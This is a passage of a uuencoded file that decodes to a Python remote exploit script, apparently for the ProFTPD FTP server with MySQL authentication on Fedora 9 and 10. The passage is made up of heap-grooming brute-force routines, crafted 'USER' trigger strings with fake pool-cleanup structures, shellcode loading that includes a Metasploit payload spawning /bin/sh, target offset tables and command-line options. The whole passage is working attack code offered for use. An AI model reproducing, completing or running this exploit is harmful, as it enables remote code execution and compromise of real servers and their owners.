M<VAU=&1O=VXB"@D)"0D)=&EM92YS;&5E<"@Q,"D*"0D)"0EC;VYT:6YU90H*
M"0D)"7-E;&8N<VMT+G-E;F0H(E5315(@)7-<<EQN(B`E('1R:6=G97(I"0D)
M"0H)"0D)<W5C8V5S<R`]('-E;&8N<VAE;&Q?:&%N9&QE<B@I"@D)"0EI9BAS
M=6-C97-S*3H*"0D)"0EP<FEN="`B6RM=($-A8VAE9"!I;F9O<FUA=&EO;B!&
M5%<B"@D)"0D)<F5T=7)N"@H)"0D)<')I;G0@(B()"0D)"@H)9&5F(')U;BAS
M96QF+"!T87)G970I.@H)"7-E;&8N=&5S=%]C86-H92@I"@H)"7!R:6YT(");
M*UT@0G)U=&5F;W)C:6YG(&UE;6]R>2!A;&QO8V%T:6]N<R!F;W(@)7,B("4@
M=&%R9V5T6R=N86UE)UT*"@D)97AP;&]I=&5D(#T@1F%L<V4*"0EA='1E;7!T
M<R`](#4W"@D)=VAI;&4H871T96UP=',I.@H)"0DC(%!I8VL@;VYE(&]F('1H
M92!A=F%I;&%B;&4@;&5N9W1H<RX@5V4@9&]N)W0@;F5C97-S87)I;'D@:VYO
M=R!H;W<@=&AE(')E;6]T90H)"0DC(&UA8VAI;F4@:7,@8V]N9FEG=7)E9"XN
M(&QU8VMI;'D@=&AE<F4G<R!O;FQY('1W;R!C;VUM;VX@;VYE<R!))W9E('-E
M96X*"0D)(R!U<V5R:60L(&%N9"!U<V5R;F%M92X@=7-E<FED(&ES('!R;V)A
M8FQY('-L:6=H=&QY(&UO<F4@;&EK96QY('1H86X*"0D)(R!U<V5R;F%M92X*
M"@D)"6-O;'5M;E]L96YG=&@@/2!R86YD;VTN8VAO:6-E*'-E;&8N=7-E<E]C
M;VQU;6Y?;&5N9W1H<RD*"@D)"6EF*"AA='1E;7!T<R`E(#,I(#T](#`I.@H)
M"0D)<')I;G0@(ELK72!'96YE<F%T:6YG('1R:6=G97(@875T:"(*"0D)"71R
M:6=G97)A=71H(#T@<V5L9BYM86ME7W5S97)?<W1R:6YG*#0X+"!C;VQU;6Y?
M;&5N9W1H*0H)"0D*"0D)86-C97!T86)L92`](#`*"0D)=VAI;&4H86-C97!T
M86)L92`A/2`R*3H*"0D)"69A:V5A=71H(#T@<V5L9BYM86ME7W5S97)?<W1R
M:6YG*#`L(&-O;'5M;E]L96YG=&@L(#,U*0H*"0D)"69I<G-T7V]F9G-E="`]
M('1A<F=E=%LG<F5S<%]B=68G72`K(&QE;B@B4&%S<W=O<F0@<F5Q=6ER960@
M9F]R("(I("L@;&5N*'-T<BAF86ME875T:"DI"@D)"0EA8V-E<'1A8FQE("`]
M('-E;&8N8VAE8VM?9F]R7V)A9%]C:&%R<RAS=')U8W0N<&%C:R@B/$PB+"!F
M:7)S=%]O9F9S970I*0H)"0D)86-C97!T86)L92`K/2!S96QF+F-H96-K7V9O
M<E]B861?8VAA<G,H<W1R=6-T+G!A8VLH(CQ,(BP@9FER<W1?;V9F<V5T*S(X
M*2D*"0D)"2-P<FEN="`B9FER<W1?;V9F<V5T.B`P>"4P.'@L(&%C8V5P=&%B
M;&4Z("5R(B`E("AF:7)S=%]O9F9S970L(&%C8V5P=&%B;&4I"@H)"0ES96QF
M+F-O;FYE8W0H*0H*"0D)9F%K95]S=')I;F<@/2!S='(H9F%K96%U=&@I"@D)
M"69A:V5?<W1R:6YG("L](")!04%!(@D)"0D)"2,@9&%T80H)"0EF86ME7W-T
M<FEN9R`K/2!S=')U8W0N<&%C:R@B/$PB+"!T87)G971;)V]F9G-E="==*0D)
M(R!C;&5A;G5P('!T<@H)"0EF86ME7W-T<FEN9R`K/2`B0D)"0B()"0D)"0DC
M(&-H:6QD(&-L96%N=7`@<'1R"@H)"0EF86ME7W-T<FEN9R`K/2!S=')U8W0N
M<&%C:R@B/$PB+"!T87)G971;)V5X96-V)UTI"0DC(&YE>'0@<&]I;G1E<B`O
M(&-A;&P@,'@P8RXN"@D)"69A:V5?<W1R:6YG("L](")$1$1$(@D)"0D)"2,@
M<&%D9&EN9PH)"0EF86ME7W-T<FEN9R`K/2!S=')U8W0N<&%C:R@B/$PB+"!F
M:7)S=%]O9F9S970K,C@I"0DC(&]F9G-E="!T;R`O8FEN+W-H"@D)"69A:V5?
M<W1R:6YG("L]('-T<G5C="YP86-K*"(\3"(L('1A<F=E=%LG<F5S<%]B=68G
M72LT,#`I"2,@;V9F<V5T('1O(%M.54Q,72!F;W(@97AE8W8*"0D)9F%K95]S
M=')I;F<@*ST@(B]B:6XO<V@B"@D)"@H)"0EA<W-E<G0H;&5N*&9A:V5?<W1R
M:6YG*2`]/2!L96XH<W1R*&9A:V5A=71H*2DK,S4I"@D)"6EF*&YO="!S96QF
M+F1O7V9A:V5?875T:"AF86ME7W-T<FEN9RDI.@H)"0D)<')I;G0@(ELK72!3
M;&5E<&EN9R!S:6YC92!S;V-K970@=V%S('-H=70@9&]W;B!D=7)I;F<@9F%K
M92!A=71H(@H)"0D)=&EM92YS;&5E<"@Q,"D*"0D)"6-O;G1I;G5E"@H)"0EI
M9BAS96QF+F]P=&EO;G,N<VQE97!?869T97)?8V]N;F5C="DZ"@D)"0EP<FEN
M="`B6RM=(%-L965P:6YG(#4@<V5C;VYD<R!S;R!A(&1E8G5G9V5R(&-A;B!B
M92!A='1A8VAE9"(*"0D)"71I;64N<VQE97`H-2D*"@D)"71R:6=G97)?<W1R
M:6YG(#T@<W1R*'1R:6=G97)A=71H*0H*"0D)(R!&:7)S="`T(&1W;W)D<R!A
M<F4@8FQO:PH*"0D)=')I9V=E<E]S=')I;F<@*ST@<W1R=6-T+G!A8VLH(CQ,
M(BP@=&%R9V5T6R=R97-P7V)U9B==*S0P,#`I"2,@:6X@8V%S92!W92!U<V4@
M=&AI<R!F;W(@86QL;V-A=&EO;BXN('=E(&IU<W0*"0D)"0D)"0D)"0DC('=A
M;G0@<V]M97=H97)E('=R:71A8FQE"@D)"71R:6=G97)?<W1R:6YG("L]('-E
M;&8N;7-F7W!A='1E<FY;-#HX70H)"0ET<FEG9V5R7W-T<FEN9R`K/2!S=')U
M8W0N<&%C:R@B/$PB+"!T87)G971;)W)E<W!?8G5F)UTK,3(P,"D)(R!C86X@
M8F4@:&ET(&EN(&)L;VL@8VQE86X@=7`@8V]D92X@<&]I;G0*"0D)"0D)"0D)
M"0DC('-O;65W:&5R92!H87)M;&5S<R`*"@D)"71R:6=G97)?<W1R:6YG("L]
M('-E;&8N;7-F7W!A='1E<FY;,3(Z,C1="@H)"0DC($YO=R!W92!H879E(&$@
M<&]O;"!S=')U8W1U<F4@:&5R90H*"0D)=')I9V=E<E]S=')I;F<@*ST@<W1R
M=6-T+G!A8VLH(CQ,(BP@9FER<W1?;V9F<V5T*0D)(R!C;&5A;G5P('-T<G5C
M='5R90H)"0ET<FEG9V5R7W-T<FEN9R`K/2!S=')U8W0N<&%C:R@B/$PB+"!T
M87)G971;)W)E<W!?8G5F)UTK,C`P,"D)(R!S=6)?<&]O;"`N+B!N97<@<&]O
M;"!M:6=H="!B92!A;&QO8V%T960@:&5R90H)"0ET<FEG9V5R7W-T<FEN9R`K
M/2!S=')U8W0N<&%C:R@B/$PB+"!T87)G971;)W)E<W!?8G5F)UTK-#`P*0DC
M('-U8E]N97AT(`H)"0ET<FEG9V5R7W-T<FEN9R`K/2!S=')U8W0N<&%C:R@B
M/$PB+"!T87)G971;)W)E<W!?8G5F)UTK-C`P*0DC('-U8E]P<F5V"@D)"71R
M:6=G97)?<W1R:6YG("L]('-T<G5C="YP86-K*"(\3"(L('1A<F=E=%LG<F5S
M<%]B=68G72LX,#`I"2,@<&%R96YT"@D)"71R:6=G97)?<W1R:6YG("L]('-T
M<G5C="YP86-K*"(\3"(L('1A<F=E=%LG<F5S<%]B=68G72LQ,#`P*0DC(&9R
M965?9FER<W1?879A:6P*"@D)"2-T<FEG9V5R7W-T<FEN9R`K/2`B04%!04)"
M0D(B"@D)"2-T<FEG9V5R7W-T<FEN9R`K/2!S=')U8W0N<&%C:R@B/$PB+"!T
M87)G971;)W)E<W!?8G5F)UTK-#`P*0H)"0DC=')I9V=E<E]S=')I;F<@*ST@
M(D1$1$0B"@D)"2-T<FEG9V5R7W-T<FEN9R`K/2`B04%!04)"0D)#0T-#1$1$
M1$5%144B"@H)"0DC<')I;G0@=')I9V=E<E]S=')I;F<N96YC;V1E*"=H97@G
M*0H*"0D)87-S97)T*&QE;BAT<FEG9V5R7W-T<FEN9RD@/3T@;&5N*'-T<BAT
M<FEG9V5R875T:"DI*S0X*0H)"@D)"7-E;&8N<VMT+G-E;F0H(E5315(@)7-<
M<EQN(B`E('1R:6=G97)?<W1R:6YG*0H*"0D):68H<V5L9BYS:&5L;%]H86YD
M;&5R*"DI.@H)"0D)<')I;G0@(BTM=7-E<BUC;VQU;6XM;&5N9W1H/25D+"!F
M86ME875T:"YL96YG=&@Z("5D+"!T<FEG9V5R875T:"YL96YG=&@Z("5D(B`E
M("@*"0D)"0EC;VQU;6Y?;&5N9W1H+"!F86ME875T:"YL96YG=&@L('1R:6=G
M97)A=71H+FQE;F=T:`H)"0D)*0H*"0D)"7-E;&8N<V%V95]C86-H92AT87)G
M970L(&9A:V5?<W1R:6YG+"!T<FEG9V5R7W-T<FEN9RD*"0D)"6)R96%K"@H)
M"0EA='1E;7!T<R`M/2`Q"@D)"7!R:6YT("(B"@IC;&%S<R!0<F]&5%!$7T)R
M=71E9F]R8V4H4')O1E101%]"87-I8W,I.@H)9&5F('1I;65I="AS96QF+"!F
M86ME+"!T<FEG9V5R*3H*"0ES96QF+F-O;FYE8W0H*0H)"7-E;&8N9&]?9F%K
M95]A=71H*&9A:V4I"@H)"7-T87)T(#T@=&EM92YT:6UE*"D*"0ES96QF+G-K
M="YS96YD*")54T52("5S7')<;B(@)2!T<FEG9V5R*0H)"0H)"7)L:7-T+"!W
M;&ES="P@>&QI<W0@/2!S96QE8W0N<V5L96-T*%MS96QF+G-K=%TL(%M=+"!;
M<V5L9BYS:W1=+"`Q+C`I"@D)<W1O<"`]('1I;64N=&EM92@I"@D)<')I;G0@
M<FQI<W0L('AL:7-T"@H)"7)E='5R;B!S=&]P("T@<W1A<G0*"@ED968@<F5P
M;&%Y*'-E;&8L(&9A:V4L('1R:6=G97(I.@H)"7-E;&8N8V]N;F5C="@I"@D)
M<V5L9BYD;U]F86ME7V%U=&@H9F%K92D*"0D*"0EP<FEN="`B4VQE97!I;F<@
M<V\@=&AA="!Y;W4@8V%N(&%T=&%C:"!A(&1E8G5G9V5R(@H)"71I;64N<VQE
M97`H-2D*"@D)<V5L9BYS:W0N<V5N9"@B55-%4B`E<UQR7&XB("4@=')I9V=E
M<BD*"0ER;&ES="P@=VQI<W0L('AL:7-T(#T@<V5L96-T+G-E;&5C="A;<V5L
M9BYS:W1=+"!;72P@6W-E;&8N<VMT72P@,2XP*0H)"0H*"61E9B!F:6YD7W1R
M:6=G97)?<W1R:6YG*'-E;&8L(&-O;'5M;E]L96YG=&@I.@H)"7)E<W5L=',@
M/2![?0H)"0H)"69O<B!I(&EN(')A;F=E*#`L(#,R*3H*"0D)9F]U;F0@/2!&
M86QS90H)"0EW:&EL92AN;W0@9F]U;F0I.@H)"0D)=')I9V=E<F%U=&@@/2!S
M96QF+FUA:V5?=7-E<E]S=')I;F<H,38L(&-O;'5M;E]L96YG=&@I"@D)"0ET
M<FEG9V5R7W-T<FEN9R`]('-T<BAT<FEG9V5R875T:"D@*R!S96QF+FUS9E]P
M871T97)N6SHQ-ET*"0D)"@D)"0EF86ME875T:"`]('-E;&8N;6%K95]U<V5R
M7W-T<FEN9R@P+"!C;VQU;6Y?;&5N9W1H+"`P*0H)"0D)9F%K95]S=')I;F<@
M/2!S='(H9F%K96%U=&@I(`H*"0D)"71I;6EN9R`]('-E;&8N=&EM96ET*&9A
M:V5?<W1R:6YG+"!T<FEG9V5R7W-T<FEN9RD*"0D)"7-T(#T@<W1R*'1I;6EN
M9RD*"@D)"0EI9BAN;W0@<F5S=6QT<RYH87-?:V5Y*'-T*2DZ"@D)"0D)9F]U
M;F0@/2!4<G5E"@H)"0ER97-U;'1S6W-T<BAT:6UI;F<I72`]("AF86ME7W-T
M<FEN9RP@=')I9V=E<E]S=')I;F<I"@H)"6ME>7,@/2!R97-U;'1S+FME>7,H
M*0H)"6ME>7,N<V]R="@I"@H)"7)E='5R;B!R97-U;'1S6VME>7-;,%U="@H)
M9&5F(&9I;F1?<W1R:6YG<RAS96QF+"!T87)G970L('5C;"DZ"@D)<F5S=6QT
M<R`]('M]"@D)<F5P;&%Y(#T@>WT*"@D)(R!E;F1P(#T@9FER<W1?879A:6P@
M/2!N;W1H:6YG(&%V86EL86)L92!I;B!T:&ES(&)L;VLN('=E(&-O=6QD(&UA
M:V4@:70*"0DC(#$P,"!B>71E<R!A=F%I;&%B;&4@:&5R92`N+@H)"7!B(#T@
M4&]O;$)L;VLH=&%R9V5T6R=S=&]P)UTL('1A<F=E=%LG<W1O<"==("L@,C`P
M+"!T87)G971;)W-T;W`G72`K(#$P,"P@,'@T,30R-#,T-"D*"0EP:"`](%!O
M;VQ(96%D97(H"@D)"71A<F=E=%LG<W1O<"==+`H)"0ET87)G971;)W-T;W`G
M72P*"0D),'@T,30Q-#$T,2P*"0D)=&%R9V5T6R=S=&]P)UT@*R`Q,#`L"@D)
M"71A<F=E=%LG<W1O<"==+`H)"0ET87)G971;)W-T;W`G72`K(#$P,"P*"0D)
M=&%R9V5T6R=S=&]P)UT@*R`Q,#`L"@D)"3!X9&5A9&)E968*"0DI"@H)"7!C
M(#T@4&]O;$-L96%N=7`H,'AD96%D8F5E9BP@,'AD96%D8F5E9BP@,'AD96%D
M8F5E9BP@,'AD96%D8F5E9BD*"@D);W9E<G=R:71E7VQE;B`](&QE;BAS='(H
M<&(I("L@<W1R*'!H*2D*"@D)9F%K95]L96X@(#T@;&5N*%!O;VQ#;&5A;G5P
M*#!X8F%B96)A8F4L(#!X8F%B96)A8F4L(#!X8F%B96)A8F4L(#!X8F%B96)A
M8F4I*2`J(#(*"0EF86ME7VQE;B`K/2!L96XH<V5L9BYS:&5L;&-O9&4I"@H)
M"2-F;W(@:2!I;B!R86YG92@P+"`Q-BDZ"@D)=VAI;&4H;&5N*')E<W5L=',I
M(#P@,C`P*3H*"0D)=')I9V=E<F%U=&@@/2!S96QF+FUA:V5?=7-E<E]S=')I
M;F<H;W9E<G=R:71E7VQE;BP@=6-L*0H)"0D*"0D)86-C97!T86)L92`](#`*
M"0D)=VAI;&4H86-C97!T86)L92`A/2`R*3H*"0D)"69A:V5A=71H(#T@<V5L
M9BYM86ME7W5S97)?<W1R:6YG*#`L('5C;"P@9F%K95]L96XI"0H*"0D)"69I
M<G-T7V]F9G-E="`]('1A<F=E=%LG<W1O<"==("L@;&5N*")087-S=V]R9"!R
M97%U:7)E9"!F;W(@(BD@*R!L96XH<W1R*&9A:V5A=71H*2D*"0D)"6%C8V5P
M=&%B;&4@(#T@<V5L9BYC:&5C:U]F;W)?8F%D7V-H87)S*'-T<G5C="YP86-K
M*"(\3"(L(&9I<G-T7V]F9G-E="DI"@D)"0EA8V-E<'1A8FQE("L]('-E;&8N
M8VAE8VM?9F]R7V)A9%]C:&%R<RAS=')U8W0N<&%C:R@B/$PB+"!F:7)S=%]O
M9F9S970K,C@I*0H*"0D)"2-P<FEN="`B9FER<W1?;V9F<V5T.B`P>"4P.'@L
M(&%C8V5P=&%B;&4Z("5R(B`E("AF:7)S=%]O9F9S970L(&%C8V5P=&%B;&4I
M"@H)"0EF86ME7W-T<FEN9R`]('-T<BAF86ME875T:"D*"0D)9F%K95]S=')I
M;F<@*ST@<W1R*'!C*2`J(#(*"0D)(W!R:6YT('-T<BAP8RDN96YC;V1E*"=H
M97@G*0H)"0D*"0D)9F%K95]S=')I;F<@*ST@<V5L9BYS:&5L;&-O9&4*"@D)
M"6%S<V5R="AF86ME7W-T<FEN9RYF:6YD*'-T<G5C="YP86-K*"(\3"(L(#!X
M9&5A9&)E968I*2`A/2`M,2D*"0D)87-S97)T*&QE;BAF86ME7W-T<FEN9RD@
M/3T@;&5N*'-T<BAF86ME875T:"DI*V9A:V5?;&5N*0H*"@D)"71R:6=G97)?
M<W1R:6YG("`]('-T<BAT<FEG9V5R875T:"D*"0D)=')I9V=E<E]S=')I;F<@
M*ST@<W1R*'!B*0H)"0ET<FEG9V5R7W-T<FEN9R`K/2!S='(H<&@I"@D*"0D)
M87-S97)T*&QE;BAT<FEG9V5R7W-T<FEN9RD@/3T@;&5N*'-T<BAT<FEG9V5R
M875T:"DI*V]V97)W<FET95]L96XI"@D*"0D)='AT(#T@<W1R*'-E;&8N=&EM
M96ET*&9A:V5?<W1R:6YG+"!T<FEG9V5R7W-T<FEN9RDI"@D)"7)E<W5L='-;
M='AT72`]("AF86ME875T:"P@=')I9V=E<F%U=&@L(&QE;BAF86ME7W-T<FEN
M9RDL(&QE;BAT<FEG9V5R7W-T<FEN9RDI"@D)"7)E<&QA>5MT>'1=(#T@*&9A
M:V5?<W1R:6YG+"!T<FEG9V5R7W-T<FEN9RD*"0D)"0H*"0D)(VEF*'-E;&8N
M<VAE;&Q?:&%N9&QE<B@I*3H*"0D)(PEP<FEN="`B+2UU<V5R+6-O;'5M;BUL
M96YG=&@])60L(&9A:V5A=71H+FQE;F=T:#H@)60L('1R:6=G97)A=71H+FQE
M;F=T:#H@)60B("4@*`H)"0DC"0EC;VQU;6Y?;&5N9W1H+"!F86ME875T:"YL
M96YG=&@L('1R:6=G97)A=71H+FQE;F=T:`H)"0DC"2D*"0D)(PH)"0DC"7-E
M;&8N<V%V95]C86-H92AT87)G970L(&9A:V5?<W1R:6YG+"!T<FEG9V5R7W-T
M<FEN9RD*"0D)(PEB<F5A:PH*"0D)<')I;G0@(B(*"@D):V5Y<R`](')E<W5L
M=',N:V5Y<R@I"@D):V5Y<RYS;W)T*"D*"0D*"0EF;W(@:V5Y(&EN(&ME>7-;
M+38Z73H*"0D)9F%K92P@=')I9V=E<BP@9FPL('1L(#T@<F5S=6QT<UMK97E=
M"@D)"7!R:6YT("(E<R(@)2!K97D*"0D)<')I;G0@(EQT)7,B("4@9F%K90H)
M"0EP<FEN="`B7'0E<R(@)2!T<FEG9V5R"@D)"7!R:6YT("(M+2(*"@H)"69P
M(#T@;W!E;B@G=&5S="YT>'0G+"`G=RLG*0H)"69P+G=R:71E*")<;B(N:F]I
M;BAK97ES*2D*"0EF<"YC;&]S92@I"@D)"@D)9G`@/2!O<&5N*"=T97-T+G!K
M;"<L("=W*R<I"@D)9G`N=W)I=&4H<&EC:VQE+F1U;7!S*')E<&QA>2DI"@D)
M9G`N8VQO<V4H*0H*"0EW:&EL92@Q*3H*"0D)<R`](')A=U]I;G!U="@B4&QE
M87-E(&5N=&5R(&]F9G-E="!T;R!R97!L87D@6VUA>"`E<UT^("(@)2`H;&5N
M*')E<W5L=',I+3$I("D*"0D)<R`](',N<W1R:7`H*0H)"0EI9BAS(#T](")E
M>&ET(BDZ(`H)"0D)8G)E86L*"@D)"6ED>"`](&EN="AS*0H*"0D)<V5L9BYR
M97!L87DH*G)E<&QA>5MK97ES6VED>%U=*0H*"0ES(#T@<F%W7VEN<'5T*")7
M:&EC:"!O9F9S970@9&\@>6]U('=A;G0@=&\@8G)U=&5F;W)C92!W:71H/B`B
M*0H)"7,@/2!S+G-T<FEP*"D*"0EI9'@@/2!I;G0H<RD*"0D*"0ER971U<FX@
M<F5S=6QT<UMK97ES6VED>%U="@H)9&5F(')U;BAS96QF+"!T87)G970I.@H)
M"7!R:6YT(");*UT@0G)U=&5F;W)C:6YG(&UE;6]R>2!A;&QO8V%T:6]N<R!F
M;W(@)7,B("4@=&%R9V5T6R=N86UE)UT*"@D)9F]U;F0@/2!&86QS90H*"0ES
M96QF+G-H96QL8V]D92`](&]P96XH)W-H96QL8V]D92YB:6XG+"`G<B<I+G)E
M860H*0H)"2,@<G5B>2`O<F]O="]M<V8S+VUS9G!A>6QO860@;&EN=7@O>#@V
M+V5X96,@0TU$/2]B:6XO<V@@4B`@/B!S:&5L;&-O9&4R+F)I;@H)"7-E;&8N
M<VAE;&QC;V1E,B`](&]P96XH)W-H96QL8V]D93(N8FEN)RP@)W(G*2YR96%D
M*"D*"@D)9F]R('5C;"!I;B!S96QF+G5S97)?8V]L=6UN7VQE;F=T:',Z"@D)
M"69A:V5A=71H+"!T<FEG9V5R875T:"P@9FPL('1L(#T@<V5L9BYF:6YD7W-T
M<FEN9W,H=&%R9V5T+"!U8VPI"@H)"0EA9&1R97-S97,@/2!R86YG92AT87)G
M971;)W-T87)T)UTL('1A<F=E=%LG<W1O<"==+"!T87)G971;)W-T97`G72D*
M"0D)<')I;G0@861D<F5S<V5S"@D)"2-A9&1R97-S97,@/2!F:6QT97(H;&%M
M8F1A('@Z("AS970H<W1R=6-T+G!A8VLH(CQ,(BP@>"DI("8@<V5L9BYB861C
M:&%R<RD@/3T@<V5T*"DL(&%D9')E<W-E<RD*"0D)(V%D9')E<W-E<R`](&9I
M;'1E<BAL86UB9&$@>#H@*'-E="AS=')U8W0N<&%C:R@B/$PB+"!X*S8T*2D@
M)B!S96QF+F)A9&-H87)S*2`]/2!S970H*2P@861D<F5S<V5S*0H)"0D*"@D)
M"7!R:6YT(")';W0@)60@=&%R9V5T<R(@)2!L96XH861D<F5S<V5S*0H)"0EF
M;W(@861D<F5S<R!I;B!A9&1R97-S97,Z"@D)"0EP<FEN="`B5')Y:6YG(#!X
M)3`X>"(@)2!A9&1R97-S"@H)"0D);6]D(#T@;&5N*")087-S=V]R9"!R97%U
M:7)E9"!F;W(@(BD*"0D)"69A:V5?<W1R:6YG("`]('-T<BAF86ME875T:"D*
M"0D)"6UO9"`K/2!L96XH9F%K95]S=')I;F<I"@D)"0EM;V0@)3T@-`H*"0D)
M"7!C(#T@4&]O;$-L96%N=7`H"@D)"0D)861D<F5S<RMM;V0K."P*"0D)"0EA
M9&1R97-S*VUO9"LX+`H)"0D)"6%D9')E<W,K;6]D*S@L"@D)"0D)861D<F5S
M<RMM;V0K*S@X"@D)"0DI"@H)"0D)9F%K95]S=')I;F<@*ST@<W1R*'!C*2`J
M(#(@"@D)"0EF86ME7W-T<FEN9R`K/2!S96QF+G-H96QL8V]D90H*"0D)"7!B
M(#T@4&]O;$)L;VLH861D<F5S<RLQ,#`L(&%D9')E<W,@*R`S,#`L(&%D9')E
M<W,@*R`R,#`L(#!X-#$T,C0S-#0I"@D)"0EP:"`](%!O;VQ(96%D97(H"@D)
M"0D)861D<F5S<RLP>#(P,"P*"0D)"0EA9&1R97-S*S!X,S`P+`H)"0D)"6%D
M9')E<W,K;6]D+3(T+"`C(&]U<B!C;&5A;G5P"@D)"0D)861D<F5S<RLP>#0P
M,"P*"0D)"0EA9&1R97-S*S!X-3`P+`H)"0D)"6%D9')E<W,K,'@V,#`L"@D)
M"0D)861D<F5S<RLP>#<P,"P*"0D)"0EA9&1R97-S*S!X-S`P+"`C(&)L86@N
M"@D)"0DI"@H)"0D)=')I9V=E<E]S=')I;F<@(#T@<W1R*'1R:6=G97)A=71H
M*0H)"0D)=')I9V=E<E]S=')I;F<@*ST@<W1R*'!B*0H)"0D)=')I9V=E<E]S
M=')I;F<@*ST@<W1R*'!H*0H*"0D)"2-P<FEN="`B;&5N*&8I.B(L(&QE;BAF
M86ME7W-T<FEN9RD*"0D)"2-P<FEN="`B9FPZ(BP@9FP*"0D)"2-P<FEN="`B
M;&5N*'0I.B(L(&QE;BAT<FEG9V5R7W-T<FEN9RD*"0D)"2-P<FEN="`B=&PZ
M(BP@=&P*"0D)"6%S<V5R="AL96XH9F%K95]S=')I;F<I(#T](&9L*0H)"0D)
M87-S97)T*&QE;BAT<FEG9V5R7W-T<FEN9RD@/3T@=&PI"@H)"0D)<V5L9BYC
M;VYN96-T*"D*"0D)"7-E;&8N9&]?9F%K95]A=71H*&9A:V5?<W1R:6YG*0H*
M"0D)"2-X(#T@<F%W7VEN<'5T*")H:70@96YT97(@=&\@=')I9V=E<B!V=6QN
M/B`B*0H*"0D)"7-E;&8N<VMT+G-E;F0H(E5315(@)7-<<EQN(B`E('1R:6=G
M97)?<W1R:6YG*0H*"0D)"7)L:7-T+"!W;&ES="P@>&QI<W0@/2!S96QE8W0N
M<V5L96-T*%MS96QF+G-K=%TL(%M=+"!;<V5L9BYS:W1=+"`U+C`I"@D)"0EI
M9BAR;&ES="`]/2!;72!A;F0@>&QI<W0@/3T@6UTI.@H)"0D)"7!R:6YT(")&
M;W5N9"!`(#!X)3`X>"(@)2!A9&1R97-S"@D)"0D)(R!"3$%(+B!N965D('1O
M(&%V;VED('1H:7,@9'5E('1O('-S;`H)"0D)"7-E;&8N<VMT+G-E;F0H<V5L
M9BYS:&5L;&-O9&4R*0H)"0D)"7-E;&8N<VAE;&Q?:&%N9&QE<B@I"@D)"0D)
M<WES+F5X:70H,2D*"F]F9G-E=%]T87)G971S(#T@6PH)>R`*"0DG;F%M92<Z
M("=&961O<F$@,3`@4')O1E101"!P<F]F='!D+6UY<W%L+3$N,RXQ+38G+`H)
M"2=T>7!E)SH@)V]F9G-E="<L"@D))W)E<W!?8G5F)SH@,'@X,&5D.#@P+`H)
M"2=O9F9S970G.B`P>#@P-C-E93,L"@D))V5X96-V)SH@,'@P.#`U,C9B."P*
M"7TL"@E[(`H)"2=N86UE)SH@)T9E9&]R82`Y(%!R;T944$0@<')O9G1P9"UM
M>7-Q;"TQ+C,N,2TS)RP*"0DG='EP92<Z("=O9F9S970G+`H)"2=R97-P7V)U
M9B<Z(#!X,#@P96)C-C`L"@D))V]F9G-E="<Z(#!X,#@P-C,Y.&4L"@D))V5X
M96-V)SH@,'@P.#`U,C8V."P*"7TL"ET*"F)R=71E9F]R8V5?=&%R9V5T<R`]
M(%L*"7L*"0DC(#`X,&4T,#`P+3`X,&5C,#`P"@D))VYA;64G.B`G4')O1E10
M1"!&0R`Q,"<L"@D))W-T87)T)SH@,'@X,&5D.#@P*S$R."P*"0DG<W1O<"<Z
M(#!X.#!E9#@P-"P*"0DG<W1E<"<Z("TR."P*"7TL"@E["@D)(R`P.#!F,3(R
M,"!L("`@("!/("YB<W,@("`P,#`P,30P,"`@("`@("`@("`@("`@<F5S<%]B
M=68*"0DG;F%M92<Z("=D96)I86X@=&5S="<L"@D))W-T87)T)SH@,'@P.#!F
M,3(R,"LR,#`L"@D))W-T;W`G.B`P>#`X,&8Q,C(P*S@P+`H)"2=S=&5P)SH@
M+3(X+`H)?0I="@ID968@9'5M<%]T87)G971S*"DZ"@EC;W5N=&5R(#T@,0H)
M<')I;G0@(D]F9G-E="!B87-E9"!T87)G971S(&%V86EL86)L93HB"@EF;W(@
M=&%R9V5T(&EN(&]F9G-E=%]T87)G971S.@H)"7!R:6YT(")<=%1A<F=E="!;
M)61=("T@)7,B("4@*&-O=6YT97(L('1A<F=E=%LG;F%M92==*0H)"6-O=6YT
M97(@*ST@,0H)"@EC;W5N=&5R(#T@,0H)<')I;G0@(B(*"7!R:6YT(")"<G5T
M969O<F-E('1A<F=E=',@879A:6QA8FQE.B(*"69O<B!T87)G970@:6X@8G)U
M=&5F;W)C95]T87)G971S.@H)"7!R:6YT(")<=%1A<F=E="!;)61=("T@)7,B
M("4@*&-O=6YT97(L('1A<F=E=%LG;F%M92==*0H*"7D@/2`P+S`*"@ES>7,N
M97AI="@Q*0H*9&5F('!A<G-E7V%R9W,H87)G<RDZ"@EP87)S97(@/2!/<'1I
M;VY087)S97(H=7-A9V4](G5S86=E.B`E<')O9R!;;W!T:6]N<UT@:&]S=%]T
M;U]E>'!L;VET(BD*"7!A<G-E<BYA9&1?;W!T:6]N*"(M="(L("(M+71A<F=E
M="(L(&%C=&EO;CTB<W1O<F4B+"!T>7!E/2)I;G0B+"!H96QP/2)$:7-T<FEB
M=71I;VX@=&\@=&%R9V5T(BP@9&5F875L=#TP+"!D97-T/2)T87)G970B*0H)
M<&%R<V5R+F%D9%]O<'1I;VXH(BUP(BP@(BTM<&]R="(L(&%C=&EO;CTB<W1O
M<F4B+"!H96QP/2)#;VYN96-T(&]N('!O<G0B+"!D969A=6QT/3(Q*0H)<&%R
M<V5R+F%D9%]O<'1I;VXH(BUS(BP@(BTM<W-L(BP@86-T:6]N/2)S=&]R95]T
M<G5E(BP@:&5L<#TB16YA8FQE(%-33"!F;W(@97AP;&]I=&%T:6]N("AV:6$@
M4D9#-#(Q-RDB+"!D969A=6QT/49A;'-E*0H)<&%R<V5R+F%D9%]O<'1I;VXH
M(BUM(BP@(BTM;6]D92(L(&%C=&EO;CTB<W1O<F4B+"!T>7!E/2)C:&]I8V4B
M+"!C:&]I8V5S/5LB8G)U=&5F;W)C92(L(")O9F9S971S(ETL(&1E9F%U;'0]
M(F]F9G-E=',B*0H)<&%R<V5R+F%D9%]O<'1I;VXH(BUL(BP@(BTM;&ES="UT
M87)G971S(BP@86-T:6]N/2)S=&]R95]T<G5E(BP@9&5F875L=#U&86QS92D*
M"@EG<F]U<"`]($]P=&EO;D=R;W5P*'!A<G-E<BP@(D1E8G5G9VEN9R!O<'1I
M;VYS(BP@(E1H97-E(&]P=&EO;G,@87)E(&UO<W1L>2!U<V5F=6P@9F]R(&1E
M8G5G9VEN9R!T:&4@97AP;&]I="!C;V1E+"!O<B!I9B!Y;W4@:VYO=R!H;W<@
M=&AE(')E;6]T92!M86-H:6YE(&ES(&-O;F9I9W5R960N(BD*"6=R;W5P+F%D
M9%]O<'1I;VXH(BTM=7-E<BUC;VQU;6XM;&5N9W1H(BP@86-T:6]N/2)S=&]R
M92(L(&1E9F%U;'0],"P@:&5L<#TB4U%,(%5S97)N86UE(&-O;'5M;B!L96YG
